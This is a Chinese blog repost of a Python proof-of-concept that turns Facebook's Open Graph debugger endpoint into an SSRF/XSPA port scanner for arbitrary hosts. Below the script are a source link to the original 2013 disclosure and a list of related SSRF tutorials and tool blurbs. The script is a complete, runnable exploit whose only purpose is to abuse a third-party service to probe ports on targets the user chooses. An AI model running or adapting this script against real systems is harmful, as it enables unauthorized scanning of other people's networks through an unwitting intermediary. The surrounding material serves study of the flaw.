XSPA / SSRF 利用脚本

最新推荐文章于 2024-06-22 12:53:35 发布
最新推荐文章于 2024-06-22 12:53:35 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: SSRF 
#Author: Riyaz Ahemed Walikar

import sys
import requests
import time

useragent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'}

def portscan(port):
        payload = {'q': 'http%3A%2F%2F' + str(ip) + '%3A' + str(port) + '%2Findex.html'}
        r = requests.get ('http://developers.facebook.com/tools/debug/og/object', allow_redirects=False, params=payload, headers=useragent)
        if r.status_code == 200:
                data = r.text
                status = 'unknown'
	        if data.find('>503</td>') > 1: #check if response contains 503 which means port closed anything else means its open
                        status = 'Closed'
                else:
                        status = 'Open'
                        
                print str(port) + ":" + status


helpmsg = 'PoC for FB URL Port Scanning\nCreated by Riyaz Ahemed Walikar\n\nUsage: \
fbportscan.py <public_ip> <portrange|all|csv_ports>\n\nExample: xspafbportscanner.py scanme.nmap.org 20-3890\nExample: \
fbportscan.py scanme.nmap.org all\nExample: xspafbportscanner.py scanme.nmap.org 22,23,80,445,3389\n\nProvide valid external/internal public hostnames/ip.'

if len(sys.argv) < 3:
        print "Not enough parameters.\n"
        print helpmsg
        sys.exit()
        
ip = sys.argv[1]
portnum = sys.argv[2]

print 'Starting portscan on ' + ip + ' using the Facebook URL: http://developers.facebook.com/tools/debug/og/object?q=\n'

if portnum.find("-") > 1:
    startport = int(portnum.split("-")[0])
    endport = int(portnum.split("-")[1])
    for port in range(startport,endport+1):
        portscan(port)
    sys.exit()
    
if str.upper(portnum) == "ALL":
    for port in range(1,65536):
        portscan(port)
    sys.exit()
    
if portnum.find(",") > 1:
    ports = portnum.split(",")
    for port in ports:
        portscan(port)
    sys.exit()

if portnum.isdigit() == 1:
    if int(portnum) > 0 and int(portnum) < 65536:
        port = int(portnum)
        portscan(port)
        sys.exit()

    
print "Invalid parameters.\n"
print helpmsg
sys.exit()



来自:http://www.riyazwalikar.com/2013/05/xspa-ssrf-bug-with-facebooks-developer.html

7禧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
evilFTP:evilFTP是一组脚本,旨在扩展利用SSRF问题时所具有的功能
03-04
evilFTP是一组脚本,在利用服务器端请求伪造(SSRF)问题时,会对过度信任的FTP客户端实施一些攻击,以扩展我们的功能。 脚本托管着一个恶意的FTP服务器,并且运行攻击所需的全部就是让客户端与FTP服务器进行交互...
网络安全-SSRF漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5337
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
一篇文章教你学会SSRF漏洞
最新发布
a770067334的博客
06-22 1063
1.1w字文章,包括SSRF漏洞介绍、原理、攻击和利用方式、SSRF利用的协议、常见的漏洞函数、可能出现漏洞的点、SSRF的危害、SSRF的防御、SSRF绕过bypass、SSRF的优势、SSRF漏洞绕过方法、常用常见限制及绕过方法、SSRF修复建议、漏洞演示、SSRF利用
什么是SSRF?
qq_32799165的博客
04-24 1087
本文详细分析了服务器端请求伪造(SSRF)的概念、工作原理及其分类,并探讨了四种常见的攻击场景及相关的代码示例。文章进一步提出了多项防御SSRF攻击的策略,包括输入验证、建立访问白名单、限制URL跳转和重定向,同时强调了应用层防火墙和安全插件的重要性。通过实际攻击案例的分析,本文展现了理解SSRF攻击、识别风险并采取有效防控措施的必要性,旨在帮助开发者和组织加强网络安全防护。
SSRF漏洞原理解析
未完成的歌~的博客
02-03 6608
文章目录0x01 基础知识1、SSRF漏洞简介:2、主要攻击方式:3、漏洞形成原理:4、漏洞的危害:0x02 漏洞检测1、漏洞验证:2、漏洞的可能出现点:0x03 绕过方法:1、绕过限制为某种域名:2、绕过限制请求IP不为内网地址:3、限制请求只为http协议:0x04 漏洞利用1、产生漏洞的函数:2、漏洞靶场:0x05 如何防御SSRF 0x01 基础知识 1、SSRF漏洞简介: SSRF全称:Server-Side Request Forgery,即 服务器端请求伪造,是一个由攻击者构造请求 在目标服务
SSRF漏洞,绕过,实战化演示
m_de_g的博客
08-13 1000
SSRF 漏洞 1.介绍ssrf漏洞 SSRF(Server-Side Request Forgery,服务度器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。 2.SSRF漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用数据的功能且没有对目标地址做过过滤与限制。例如,黑客操作服务器端从URL地址获取网页文本内容,加载指定地址的图片等,利用
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
渗透工具SSRFIRE:​自动 SSRF 查找器。
学习、分享、交流
04-26 540
​ 自动SSRF查找器。只需提供域名和您的服务器,然后放松一下!;)它还具有查找XSS和打开重定向的选项。 ​
CTFHub技能树web(持续更新)--SSRF--端口扫描
jiuyongpinyin的博客
02-02 2841
端口扫描 题目提示端口扫描,让我想到了是不是在和之前的内网访问漏洞差不多,经过尝试,返回的状态码是200: 那也就是说这个思路没啥问题,题目又提示端口的范围是8000-9000,那我们就使用burpsuite攻击模块试一下: 开始攻击: 我们访问这个端口: 得到了flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
【漏洞学习——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本
Fly_鹏程万里
02-22 6661
漏洞细节 ## 1. 描述 本文章将概述一些经典的SSRF漏洞利用原理,从Fuzz扫描开放的服务到漏洞的自动化利用,刚好腾讯的这个漏洞点,非常适合做为案例来演示。### 1.1 漏洞信息 &gt; 腾讯微博应用  &gt; http://share.v.t.qq.com &gt; SSRF利用点,参数: url &gt; http://share.v.t.qq.com/index.php?c=s...
python漏洞利用脚本_动力ssrf漏洞利用python脚本
weixin_39908082的博客
12-18 629
扫描本机开放的端口:#!/usr/bin/env python# -*- coding: utf-8 -*-# @Author: Lcy# @Date: 2016-07-05 20:55:30# @Last Modified by: Lcy# @Last Modified time: 2016-10-10 16:26:14import requestsimport threadingimp...
浅谈SSRF漏洞
anwar2005的博客
09-10 266
SSRF漏洞是如何产生的? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对...
SSRF漏洞分析与利用
3569
11-06 7671
http://www.91ri.org/17111.html 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 漏洞产生 以curl为例,漏洞代码为ssrf.php Default 1234567
SSRF漏洞介绍及利用
星落的博客
06-11 8989
SSRF简介 SSRF(server-site request forey,服务器请求伪造)是一种构造请求,由服务器发起请求的安全漏洞。 一般的情况下,SSRF的目标就是与外部隔离的内网资源 SSRF漏洞原理 服务器提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。 SSRF漏洞的验证方法 1.因为SSRF漏洞是让服务器发送请求的安全漏洞,所以我们可以通过抓包分析发送的请求是否是由服务器发送的,从而判断是否存在SSRF漏洞 2.在页面源码中查找访问的资源地址,如果该资源地址类
xvwa SSRF/XSPA
09-11
SSRF (Server-Side Request Forgery)是指攻击者通过欺骗服务器发起请求,从而使服务器在其控制范围内请求指定的目标站点。而XSPA (Cross-Site Port Attacks)是一种利用SSRF漏洞的攻击应用,它利用目标服务器允许从其他服务器发出请求的功能,将请求发送到目标服务器的内部端口进行攻击。 另一方面,XSS (Cross-Site Scripting)和CSRF (Cross-Site Request Forgery)是与SSRF和XSPA有关的其他安全漏洞。XSS是一种通过在受信任的网站上注入恶意脚本来攻击用户的漏洞,而CSRF是一种利用用户在受信任的网站上已经通过身份验证的会话来进行欺骗并执行未经授权的操作的漏洞。 关于xvwa SSRF/XSPA的具体含义可能需要更多的上下文来确定。XVWA是一个虚拟漏洞应用程序,旨在帮助安全专业人员学习和演练各种常见的Web应用程序漏洞,包括SSRF和XSPA。它可以用于测试和学习有关这些漏洞的概念和实践。 综上所述,SSRF是一种利用服务器端请求伪造漏洞进行攻击的技术,而XSPA是一种利用SSRF漏洞的特定攻击应用。XSS和CSRF是与SSRF和XSPA相关的其他安全漏洞。xvwa SSRF/XSPA可能是指在XVWA中进行SSRF和XSPA漏洞测试和实践的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值